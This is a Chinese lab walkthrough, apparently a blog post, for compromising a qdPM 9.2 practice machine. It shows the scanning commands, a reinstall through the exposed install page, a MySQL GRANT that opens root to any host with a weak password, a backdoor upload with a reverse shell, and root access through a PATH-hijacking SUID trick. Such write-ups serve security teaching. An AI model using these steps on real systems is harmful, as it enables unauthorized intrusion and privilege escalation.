这绝对是最简单的一个题目了。
目标发现
netdiscover -r 192.168.0.10/24 根据靶场和本地系统的网段进行扫描。
信息收集
nmap -sV -Pn -sT -sC -A 192.168.0.199
根据简单的扫描也就是三个服务,一个ssh 一个http 一个mysql
访问http服务 是个登陆的地址,网页源代码也没有什么有用的信息。
大概信息可以看出来是一个cms 名字应该是qdPM 9.2 是个php
dirsearch -u http://192.168.0.199 -w /usr/share/wordlists/dirb/common.txt -e html,txt,php -f -i 200,302 扫描一下目录。
结果就是这些,发现install立马就访问了,可以重装程序。
那么这里就可以把数据装到我们本地进行登陆看看。
这里需要注意 的是由于靶场和我们本地的mysql是两个环境,如果要让靶场把数据装在本地,需要本地mysql,允许远程连接简单的开启命令是
grant all privileges on *.* to root@'%' identified by '123456' with grant option; flush privileges; 在本地mysql执行这条语句后,就允许远程任意地址以账号root密码123456 进行访问。
安装后就可以登陆后台了。
登陆以后没有利用点,需要创建一个管理员用户。在创建的用户中才能操作。
这里上传后门后不能直接使用的。
要用文件路径访问才行,由于扫描信息的时候发现了uploads目录,所以去那里找到。
这里就是后门文件的绝对路径,根据自己上传的木马类型,进行连接即可。我这里是将shell反弹到本地的6666端口
python3 -c 'import pty;pty.spawn("/bin/bash")' 升级交互。
sudo 需要密码。所以查看系统中是否有可以利用的suid文件。
find / -perm -u=s -type f 2>/dev/null 查看系统中拥有特殊权限的文件。
/usr/bin 目录下的大多是安装的程序。那get_access这个可能就是用户自己创建。的所以优先去看他。
/opt$ strings /opt/get_access 可以查看get_access文件中的可见字符
可以看到他运行了cat
那么通过环境变量将伪造一个cat就可以实现用root权限执行伪造cat中的内容。
echo '/bin/bash' > /tmp/cat 在tmp目录中创建一个cat文件,写入 /bin/bash
并给予执行权限。chmod 777 /tmp/cat
将tmp添加到环境变量中。
export PATH=/tmp:$PATH
然后执行该文件 /opt/get_access 即可获得root权限。
140
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
